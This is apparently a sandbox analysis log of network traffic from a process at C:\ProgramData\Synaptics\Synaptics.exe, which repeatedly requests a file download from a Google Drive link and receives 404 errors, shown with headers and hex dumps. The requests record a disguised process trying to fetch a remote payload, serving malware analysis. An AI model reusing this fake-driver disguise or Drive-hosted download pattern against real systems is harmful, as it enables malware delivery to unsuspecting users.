                                                                                                                                                                                        2022-05-17 11:32:07 UTC874INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 38 6d 6c 77 43 50 33 44 57 4d 66 55 6d 46 35 43 49 2b 4b 41 39 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="8mlwCP3DWMfUmF5CI+KA9w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:32:07 UTC875INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:32:07 UTC875INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        288192.168.2.350076142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:07 UTC872OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:07 UTC875INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:07 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-FJHlVQWaDrTAEDMXyt7GMw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:07 UTC877INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:32:07 UTC877INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 71 34 48 6c 61 2f 2b 6b 71 5a 74 6c 38 44 33 53 6d 61 62 33 41 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="q4Hla/+kqZtl8D3Smab3AA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:32:07 UTC878INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:32:07 UTC878INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        289192.168.2.350077142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:07 UTC878OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:07 UTC879INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:07 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-24703PNcIVtd2by33RD1Eg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:07 UTC880INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:32:07 UTC880INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 34 4f 69 43 74 54 2f 72 4d 2f 71 6a 6d 32 49 34 32 56 32 34 4c 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="4OiCtT/rM/qjm2I42V24Lg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:32:07 UTC881INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:32:07 UTC881INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        29192.168.2.349769142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:32 UTC84OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:33 UTC87INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:32 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-BZeZiQGiMZh+Zol2aI+wPg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:33 UTC88INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:33 UTC88INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4c 4c 33 73 51 67 76 4f 42 32 76 51 71 44 6e 67 73 30 51 47 43 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="LL3sQgvOB2vQqDngs0QGCg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:33 UTC90INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:33 UTC90INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        290192.168.2.350078142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:07 UTC878OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:07 UTC882INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:07 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-kbVZhEupb/PxC6pV0ifRPA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:07 UTC883INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:32:07 UTC883INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 57 4c 36 30 54 66 62 58 6a 2f 43 4b 61 7a 50 33 77 64 52 71 33 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="WL60TfbXj/CKazP3wdRq3g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:32:07 UTC884INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:32:07 UTC884INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        291192.168.2.350079142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:07 UTC881OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:07 UTC885INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:07 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-N8+BCspVsTB6gf5InbneSQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
